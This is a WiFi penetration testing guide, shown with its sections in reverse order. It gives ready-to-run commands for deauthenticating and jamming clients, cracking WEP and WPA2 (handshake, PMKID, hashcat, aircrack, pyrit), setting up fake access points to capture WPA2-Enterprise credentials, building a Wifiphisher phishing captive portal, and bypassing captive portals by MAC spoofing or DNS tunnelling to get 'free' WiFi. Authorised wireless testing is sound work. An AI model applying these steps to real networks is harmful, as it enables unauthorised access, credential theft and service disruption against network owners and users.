WiFi Penetration Testing Guide
Ettercap - Check if you can do a MitM attack and sniff all the traffic in the network
7.3. Spoofing
Nmap/Zenmap - Security Scanner, Port Scanner, & Network Exploration Tool
Masscan - The faster version of nmap (it can break things, so be careful)
Netdiscover - ARP sniffing. Very useful if the networks are very well segmented
7.2. Types of scanners
Routersploit - Exploitation Framework for Embedded Devices - Test "use scanners/autopwn"
7.1. Attacking the router
Once you are connected to the network
7. Post-exploitation
Acrylic - Useful for recon phase
Ekahau - Useful for Wi-Fi planning
Vistumbler - Useful for wardriving
Windows:
Wifi Pumpkin - Framework for Rogue WiFi Access Point Attack
Eaphammer - Framework for Fake Access Points
WEF - Framework for different types of attacks for WPA/WPA2 and WEP, automated hash cracking and more
Linux:
6.4. Other frameworks
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MACAn example to deauthenticate all the devices except a Fake Acess Point:
Wifijammer - This program can send deauthentication packets to both APs and clients.
6.3. Wifi Jamming
6.2. OSINT
Krack Attack Scripts - Explained in this website
Frag Attack Scripts - Explained in this website
These are two advanced attacks discovered by the great Mathy Vanhoef:
6.1. Krack Attack and Frag Attack
6. Other attacks
Find supported EAP methods
5.3 EAP methods supported
5.2 Brute force
sh hostapd_wpe_init.sh $AP_NAME $INTERFACEHostapd-wpe
sh freeradius_wpe_read.shWhen a client connects, read logs with:
sh freeradius_wpe_init.sh $AP_NAME $INTERFACEStart the Access Point using:
Hostapd & Freeradius-wpe
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
cd WPA_Enterprise_Attack && sudo sh install.shIn case you do not want to use the virtual machine, you can install everything using:
Local installation
Virtual machines download
5.1 Fake Access Points
5. WPA2-Enterprise
For that, you have to create a Fake Access Point using hostpad with a configuration file like this one, with any password but the same network name. Create the fake network, the client device will try to connect to it and you get the 4-way handshake as in the 4.1 section in this guide.
If you have access to a client device with the Wifi connection turned on but there is not a network around, you can still attack that network if the client devices has previously connected to it.
4.3. AP-less attack
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --forceCrack it using Hashcat (option 16800)
The structure of each line is: PMKID * ROUTER MAC * STATION * ESSID (check at: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hcxpcaptool -z $HASH_FILE $PCAPNG_FILECreate $HASH_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2Capture PMKID
echo $MAC | sed 's/://g' > $FILTER_FILECreate a text file ($FILTER_FILE) and add the MAC address without ":". You can use sed and redirect the output to a file:
3a. If you want to attack a specific MAC address
airmon-ng check killInstall Hcxdumptool and Hcxtool (you can use this script).
Stop Network Manager
You can use this script or follow these steps:
4.2. PMKID attack
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_dbOption 2: Crack the handshake using Pyrit
You can get wordlists from here.
aircrack-ng -w $WORDLIST capture.capOption 1: Crack the handshake using Aircrack-ng
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACEDeauthenticate an user. Stop airodump capture when you see a message 'WPA handshake: $MAC'
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACEStart capture
4.1. Cracking the 4-way-handshake
4. WPA2-PSK cracking
aircrack-ng $PCAP_FILECrack the password using Aircrack-ng
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACEAccelerate the IV capture using Fake authentication + Arp Request Replay Attack + Deauthenticate user. Stop Airodump at ~100.000 different IVs
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACEStart capture
3. WEP cracking
ARP Spoofing attack using Ettercap
Sniff the traffic using Wireshark or TCPdump
Analyze the traffic using PCredz (Linux) or Network Miner (Windows)
Once you are in the network, you can test if it is vulnerable to Man in the Middle attacks.
2.2. Man in the Middle attack
ssh -D 8080 $USER@10.0.0.1Create the tunnel
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAINCheck if it works correctly in here
Execution in the client
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAINExecution in the server
One "A record": dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com 139.59.172.117)
One "NS record": hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com)
Create 2 DNS records (in Digital ocean, Afraid.org...):
nslookup example.comCheck the domain names are resolved:
A second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get "free" Wifi in hotel, airports...
2.1.3. Bypass 2: DNS tunnelling
Also, you can use scripts to automate the process like:
macchanger
A custom script like this(Bash)
Change your IP and MAC addresses. You can use:
nmap
Scan the network and get the list of IP and MAC addresses. You can use:
The first method to bypass a captive portal is to change your MAC address to one of an already authenticated user
2.1.2. Bypass 1: MAC spoofing
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nEClone a website using HTTrack
Install Wifiphiser. Add the HTTrack result in a new folder in wifiphisher/data/phishing-pages/new_page/html and a configuration file in wifiphisher/data/phishing-pages/new_page/config.ini.
Recompile the project using python setup.py install or the binary in bin.
This command works correctly in the latest Kali release after installing hostapd:
2.1.1. Fake captive portals
2.1. Captive portals
2. Open networks
For the character set it is possible to use l (lowercase letters), u (uppercase letters), n (numbers), c (lowercase+uppercase), m (lowercase+uppercase+numbers) or a (all printed).
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET2.b. Or execute a bruteforce attack
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH2.a. Execute a dictionary attack
List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
List networks
Get hidden SSID without clients
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACEIn another terminal, deauthenticate a client or all of them. When Airodump-ng captures a handshake from this network, the name or ESSID will appear in the first terminal:
Deauthenticate
List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
List networks
Get hidden SSID with clients
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACEAn Access Point (= all the clients in the AP)
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACEOnly one client
Deauthentication
airodump-ng $IFACE -c $CHANNEL -e $ESSIDSet monitor mode
Run Airodump-ng-ng
List networks
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE upSet monitor mode
ifconfig $IFACECheck interface status
iwconfig $IFACECheck interface mode
VARIABLE=valueSet environment variable
1. Basic commands
Last updated